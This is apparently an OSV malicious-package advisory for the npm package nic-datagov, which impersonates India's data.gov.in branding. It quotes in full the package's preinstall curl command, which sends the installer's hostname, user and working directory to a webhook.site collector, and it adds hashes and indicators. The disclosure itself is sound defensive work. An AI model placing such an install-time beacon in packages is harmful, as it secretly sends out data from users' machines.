MAL-2026-5836

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/nic-datagov/MAL-2026-5836.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5836
Published
2026-06-15T10:05:40Z
Modified
2026-06-16T06:01:50Z
Summary
Malicious code in nic-datagov (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf)

package.json declares a preinstall script that runs curl --data-urlencode "info=$(hostname && whoami && pwd)" https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/nic-datagov, sending the installer's hostname, current user, and working directory to a webhook.site collector on npm install. The package ships no library code and has no main/files consistent with its stated 'NIC Data.gov.in integration library' description — its sole effect on install is the recon beacon. The name and description impersonate India's NIC/data.gov.in branding, consistent with a targeted dependency-confusion probe against an internal/government namespace.

Source: ossf-package-analysis (cde3f0f0a325ac483003eea66dda1dd21f2de2a149a97a7df41c7fb447c5a8ee)

The OpenSSF Package Analysis project identified 'nic-datagov' @ 1.0.0 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006709",
            "import_time": "2026-06-15T21:33:34.632503427Z",
            "modified_time": "2026-06-15T20:31:19Z",
            "sha256": "89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf",
            "source": "amazon-inspector",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "import_time": "2026-06-16T05:56:18.583871776Z",
            "modified_time": "2026-06-15T10:05:40Z",
            "sha256": "cde3f0f0a325ac483003eea66dda1dd21f2de2a149a97a7df41c7fb447c5a8ee",
            "source": "ossf-package-analysis",
            "versions": [
                "1.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / nic-datagov

Package

Affected ranges

Affected versions

1.*
1.0.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "1702d2ae9a92ede8848c2d5683faa5274c4cc6a30258e9a24495b6bdeff50281",
            "tlsh": "13d02be82914b1732dcd46b10914c05de731bf2f10d418196dd64125a0471f6391b76f"
        }
    ],
    "package_integrity": [
        {
            "filename": "nic-datagov-1.0.0.tgz",
            "hashes": {
                "sha1": "6e79d987bad0ef7e48bdfe01c416b8944cc67bb0",
                "sha512_sri": "sha512-amRv8T/qMzT6BZ/yrto/FN89vYKDpGYmKA88Ev8GMs1b3aDDIhvIepPHcubVnuZsi7x+kJ2Th/6Kq1T+8Hld5Q=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/nic-datagov/MAL-2026-5836.json"